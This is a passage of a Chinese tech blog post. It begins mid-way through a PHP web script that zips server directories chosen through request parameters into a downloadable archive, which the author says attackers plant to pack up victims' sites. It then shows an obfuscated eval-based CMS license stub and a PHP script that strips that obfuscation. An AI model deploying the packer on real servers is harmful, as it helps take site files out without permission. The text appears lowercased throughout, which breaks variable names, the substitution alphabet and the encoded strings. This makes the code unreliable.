$datastr .= pack('v',0).pack('v',0).pack('v',0).pack('v',strlen($name) );
$datastr .= pack('v',0 ).$name.pack('v',0).pack('v',0).pack('v',0);
fwrite($this->fp,$datastr);
$my_datastr_len = strlen($datastr);
unset($datastr);
$dirstr = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$dirstr .= pack('v',0).pack('v',0).pack('v',0).pack('v',strlen($name) );
$dirstr .= pack('v',0 ).pack('v',0 ).pack('v',0 ).pack('v',0 );
$dirstr .= pack('v',16 ).pack('v',$this->datastr_len).$name;
$this->dirstr .= $dirstr;
$this ->file_count ++;
$this ->dirstr_len += strlen($dirstr);
$this ->datastr_len += $my_datastr_len;
}
function createfile()
{
$endstr = "\x50\x4b\x05\x06\x00\x00\x00\x00".
pack('v',$this ->file_count) .
pack('v',$this ->file_count) .
pack('v',$this ->dirstr_len) .
pack('v',$this ->datastr_len) .
"\x00\x00";
fwrite($this->fp,$this->dirstr.$endstr);
fclose($this->fp);
}
}
if(!trim($_request[zipname]))
$_request[zipname] = 'dodozip.zip';
else
$_request[zipname] = trim($_request[zipname]);
if(!strrchr(strtolower($_request[zipname]),'.')=='.zip')
$_request[zipname] .= '.zip';
$_request[todir] = str_replace('\\','/',trim($_request[todir]));
if(!strrchr(strtolower($_request[todir]),'/')=='/')
$_request[todir] .= '/';
if($_request[todir]=='/')
$_request[todir] = './';
function listfiles($dir='.')
{
global $dodozip;
$sub_file_num = 0;
if(is_file("$dir"))
{
if(realpath($dodozip ->gzfilename)!=realpath("$dir"))
{
$dodozip ->addfile(implode('',file("$dir")),"$dir");
return 1;
}
return 0;
}
$handle=opendir("$dir");
while ($file = readdir($handle))
{
if($file=='.'||$file=='..')
continue;
if(is_dir("$dir/$file"))
{
$sub_file_num += listfiles("$dir/$file");
}
else
{
if(realpath($dodozip ->gzfilename)!=realpath("$dir/$file"))
{
$dodozip ->addfile(implode('',file("$dir/$file")),"$dir/$file");
$sub_file_num ++;
}
}
}
closedir($handle);
if(!$sub_file_num)
$dodozip ->addfile('',"$dir/");
return $sub_file_num;
}
function num_bitunit($num)
{
$bitunit=array(' b',' kb',' mb',' gb');
for($key=0;$key<count($bitunit);$key++)
{
if($num>=pow(2,10*$key)-1)
{
$num_bitunit_str=(ceil($num/pow(2,10*$key)*100)/100)." $bitunit[$key]";
}
}
return $num_bitunit_str;
}
if(is_array($_request[dfile]))
{
$dodozip = new phpzip;
if($_request['filetype'] != null)
$dodozip ->setfilefilter($_request['filetype']);
if($dodozip ->startfile("$_request[todir]$_request[zipname]"))
{
echo 'working,please wait...<br><br>';
$filenum = 0;
foreach($_request[dfile] as $file)
{
if(is_file($file))
{
if(!empty($dodozip ->filefilters))
if (!in_array(end(explode('.',$file)),$dodozip ->filefilters))
continue;
echo "<font face=\"wingdings\" size=\"5\">2</font>  $file<br>";
}
else
{
echo "<font face=\"wingdings\" size=\"5\">0</font> $file<br>";
}
$filenum += listfiles($file);
}
$dodozip ->createfile();
echo "<br>success,for $filenum files.url:<a href='$_request[todir]$_request[zipname]' _fcksavedurl='$_request[todir]$_request[zipname]'>$_request[todir]$_request[zipname] (".num_bitunit(filesize("$_request[todir]$_request[zipname]")).')</a>';
}
else
{
echo "$_request[todir]$_request[zipname] error,unable to write file.<br>";
}
}
;echo '
</form>
</body>
</html>
';?>

这是一个用来打包成zip的php代码,这些鸟人为了黑别人的网站什么办法都用,真恶心~~
下如是一个高人写的thinkphp框架(sgcms)解密程序:
复制代码 代码如下:

<?php
// this file is protected by sgcms & provided under license.
copyright(c) 2007-2010 www.sgcms.cn, all rights reserved.
$ooo0o0o00=__file__;
$ooo000000=urldecode('th6sbehqla4co_sadfpnr');
$oo00o0000=21496;
$ooo0000o0=$ooo000000{4}.
$ooo000000{9}.$ooo000000{3}.$ooo000000{5};
$ooo0000o0.=$ooo000000{2}.$ooo000000{10}.$ooo000000{13}.$ooo000000{16};
$ooo0000o0.=$ooo0000o0{3}.$ooo000000{11}.$ooo000000{12}.$ooo0000o0{7}.$ooo000000{5};
$o0o0000o0='ooo0000o0';
eval(($$o0o0000o0('je9pme9pmdawmd0kt09pmdawmdaweze3fs4kt09pmdawm...

很明显,是使用了某种php代码混淆工具混淆了下,google网上搜了下,问题解决,给遇到同样问题的朋友一个方便。
解密php文件:
复制代码 代码如下:

<?php
$filename="globalaction.class.php";//要解密的文件
$lines = file($filename);//0,1,2行
//第一次base64解密
$content="";
if(preg_match("/o0o0000o0\('.*'\)/",$lines[1],$y))
{
$content=str_replace("o0o0000o0('","",$y[0]);
$content=str_replace("')","",$content);
$content=base64_decode($content);
}
//第一次base64解密后的内容中查找密钥
$decode_key="";
if(preg_match("/\),'.*',/",$content,$k))
{
$decode_key=str_replace("),'","",$k[0]);
$decode_key=str_replace("',","",$decode_key);
}
//查找要截取字符串长度
$str_length="";
if(preg_match("/,\d*\),/",$content,$k))
{
$str_length=str_replace("),","",$k[0]);
$str_length=str_replace(",","",$str_length);
}
//截取文件加密后的密文
$secret=substr($lines[2],$str_length);
//echo $secret;
//直接还原密文输出
echo "<?php\n".base64_decode(strtr($secret,$decode_key,
'abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789+/')).
"?>";
?>

您可能感兴趣的文章:

如对本文有疑问, 点击进行留言回复!!

相关文章:

验证码:
最近更新的文章
大家感兴趣的文章
移动技术网